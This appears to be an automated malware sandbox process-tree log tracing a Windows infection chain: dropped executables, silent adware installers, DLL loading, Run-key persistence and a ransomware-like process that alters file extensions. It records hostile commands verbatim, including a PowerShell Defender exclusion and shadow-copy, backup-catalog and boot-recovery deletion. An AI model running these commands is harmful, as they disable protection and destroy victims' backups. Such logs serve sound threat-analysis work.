                                                                                                                                                            • C:\Users\Admin\Documents\hokD3PTLQSSwTOQbjs46iQbu.exe
                                                                                                                                                              "C:\Users\Admin\Documents\hokD3PTLQSSwTOQbjs46iQbu.exe"
                                                                                                                                                              6⤵
                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                              PID:7104
                                                                                                                                                              • C:\Users\Admin\Documents\hokD3PTLQSSwTOQbjs46iQbu.exe
                                                                                                                                                                C:\Users\Admin\Documents\hokD3PTLQSSwTOQbjs46iQbu.exe
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:7836
                                                                                                                                                              • C:\Users\Admin\Documents\LMWBld729vM0NLcjGUIXs50T.exe
                                                                                                                                                                "C:\Users\Admin\Documents\LMWBld729vM0NLcjGUIXs50T.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                PID:1796
                                                                                                                                                              • C:\Users\Admin\Documents\X8ggw6QAmUZo5h6DtPyzpOme.exe
                                                                                                                                                                "C:\Users\Admin\Documents\X8ggw6QAmUZo5h6DtPyzpOme.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:8052
                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\X8GGW6~1.DLL,s C:\Users\Admin\DOCUME~1\X8GGW6~1.EXE
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    PID:9168
                                                                                                                                                                    • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                                      C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\X8GGW6~1.DLL,QzESOFhQcQ==
                                                                                                                                                                      8⤵
                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                                      PID:8848
                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\X8GGW6~1.DLL
                                                                                                                                                                        9⤵
                                                                                                                                                                          PID:10080
                                                                                                                                                                  • C:\Users\Admin\Documents\Lx1ZUHXJ3OrL_roz81lD9EQ3.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\Lx1ZUHXJ3OrL_roz81lD9EQ3.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:5132
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-OLGIO.tmp\Lx1ZUHXJ3OrL_roz81lD9EQ3.tmp
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-OLGIO.tmp\Lx1ZUHXJ3OrL_roz81lD9EQ3.tmp" /SL5="$703C6,138429,56832,C:\Users\Admin\Documents\Lx1ZUHXJ3OrL_roz81lD9EQ3.exe"
                                                                                                                                                                        7⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                        PID:572
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-2B6LC.tmp\Setup.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-2B6LC.tmp\Setup.exe" /Verysilent
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:6188
                                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                              9⤵
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                                              • Modifies system certificate store
                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                              PID:8760
                                                                                                                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629586615 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                                10⤵
                                                                                                                                                                                  PID:10524
                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:5584
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-MGVT8.tmp\MediaBurner2.tmp
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-MGVT8.tmp\MediaBurner2.tmp" /SL5="$202F8,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          PID:6136
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-41OH3.tmp\ultradumnibour.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-41OH3.tmp\ultradumnibour.exe" /S /UID=burnerch2
                                                                                                                                                                            7⤵
                                                                                                                                                                              PID:6756
                                                                                                                                                                              • C:\Program Files\Windows NT\YYXHAJQRGW\ultramediaburner.exe
                                                                                                                                                                                "C:\Program Files\Windows NT\YYXHAJQRGW\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:7532
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-474KC.tmp\ultramediaburner.tmp
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-474KC.tmp\ultramediaburner.tmp" /SL5="$30488,281924,62464,C:\Program Files\Windows NT\YYXHAJQRGW\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                    9⤵
                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                    PID:5536
                                                                                                                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                      "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                      10⤵
                                                                                                                                                                                        PID:6788
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\44-540a5-b08-6d88b-e70a65d1699db\Fapitecale.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\44-540a5-b08-6d88b-e70a65d1699db\Fapitecale.exe"
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:8216
                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                                        dw20.exe -x -s 1332
                                                                                                                                                                                        9⤵
                                                                                                                                                                                          PID:2936
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\c1-96b00-493-89d99-a753e0728eafd\Taexaeshocife.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\c1-96b00-493-89d99-a753e0728eafd\Taexaeshocife.exe"
                                                                                                                                                                                        8⤵
                                                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                                                        PID:8272
                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\boblvgda.eed\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                          9⤵
                                                                                                                                                                                            PID:6480
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\boblvgda.eed\GcleanerEU.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\boblvgda.eed\GcleanerEU.exe /eufive
                                                                                                                                                                                              10⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                              PID:2204
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\boblvgda.eed\GcleanerEU.exe" & exit
                                                                                                                                                                                                11⤵
                                                                                                                                                                                                  PID:6728
                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                      PID:5388
                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                      taskkill /im "GcleanerEU.exe" /f
                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                      PID:8796
                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g34cvqlw.nw5\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                9⤵
                                                                                                                                                                                                  PID:7616
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\g34cvqlw.nw5\installer.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\g34cvqlw.nw5\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                      PID:6820
                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2k5rkvin.uyu\anyname.exe & exit
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                      PID:5388
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\2k5rkvin.uyu\anyname.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\2k5rkvin.uyu\anyname.exe
                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                          PID:2068
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2k5rkvin.uyu\anyname.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\2k5rkvin.uyu\anyname.exe" -q
                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                              PID:5784
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ebuyvi1x.w3p\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                            PID:5572
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\ebuyvi1x.w3p\gcleaner.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\ebuyvi1x.w3p\gcleaner.exe /mixfive
                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                PID:7560
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ebuyvi1x.w3p\gcleaner.exe" & exit
                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                    PID:9824
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                      taskkill /im "gcleaner.exe" /f
                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                      PID:9780
                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\231j001y.1mu\autosubplayer.exe /S & exit
                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                PID:10000
                                                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:5436
                                                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          PID:6324
                                                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:4116
                                                                                                                                                                                                • C:\Users\Admin\Documents\9uYgZkgS3XwN7z_tehB60XIr.exe
                                                                                                                                                                                                  "C:\Users\Admin\Documents\9uYgZkgS3XwN7z_tehB60XIr.exe"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                  PID:2844
                                                                                                                                                                                                • C:\Users\Admin\Documents\1AKUBdPthFtxYU_pWBTh89Pm.exe
                                                                                                                                                                                                  "C:\Users\Admin\Documents\1AKUBdPthFtxYU_pWBTh89Pm.exe"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:2460
                                                                                                                                                                                                  • C:\Users\Admin\Documents\1AKUBdPthFtxYU_pWBTh89Pm.exe
                                                                                                                                                                                                    "C:\Users\Admin\Documents\1AKUBdPthFtxYU_pWBTh89Pm.exe" -q
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:4948
                                                                                                                                                                                                • C:\Users\Admin\Documents\R7_uP7PjfaAYreXfglrgrLLX.exe
                                                                                                                                                                                                  "C:\Users\Admin\Documents\R7_uP7PjfaAYreXfglrgrLLX.exe"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:2304
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 388
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:3144
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 368
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:4768
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 352
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:3400
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 624
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:5244
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 660
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:5980
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 696
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:4932
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 636
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:4460
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 752
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:5644
                                                                                                                                                                                                • C:\Users\Admin\Documents\llVVu0HlsK1Kw5wuGRgoKpD7.exe
                                                                                                                                                                                                  "C:\Users\Admin\Documents\llVVu0HlsK1Kw5wuGRgoKpD7.exe"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                  PID:3260
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-OMA5K.tmp\VPN.tmp
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-OMA5K.tmp\VPN.tmp" /SL5="$103A4,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                PID:5624
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-ELABG.tmp\Setup.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-ELABG.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:7920
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-JHMSA.tmp\Setup.tmp
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-JHMSA.tmp\Setup.tmp" /SL5="$802DA,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-ELABG.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                      PID:6348
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                          PID:9184
                                                                                                                                                                                                          • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                            tapinstall.exe remove tap0901
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                            PID:6156
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:7488
                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                              tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                              PID:1160
                                                                                                                                                                                                          • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                            "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                            PID:1256
                                                                                                                                                                                                          • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                            "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                            PID:10052
                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                      PID:312
                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:5592
                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:6128
                                                                                                                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                        C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                        PID:1888
                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding EF96011E6E05ADC9F83E52AB605A6545 C
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                          PID:5556
                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 3D1154B6896FB74A258700951AFDC573 C
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          PID:7408
                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding FD716386239C6AD11FC8C96CDB624F23 C
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          PID:8884
                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 2B5E2727CC7D906C7AF0B7A991F1F50C
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                          PID:9632
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                          PID:10968
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=715 -BF=715 -uncf=default
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                            PID:10624
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--M3yPGhgtKO"
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:10412
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_EAB4.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites' -retry_count 10"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:10648
                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:5592
                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                              PID:7112
                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:1040
                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                PID:9056
                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:7916
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\D6BC.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\D6BC.exe
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:6960
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\F6F7.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\F6F7.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                    PID:9892
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\BC.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\BC.exe
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                    PID:10040
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\spoolsv.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\spoolsv.exe" -start
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                                      PID:9876
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\spoolsv.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\spoolsv.exe" -agent 0
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Modifies extensions of user files
                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                        PID:7044
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:8144
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                            wmic shadowcopy delete
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:8520
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:4124
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                                vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                                                                PID:9244
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:8164
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:9124
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
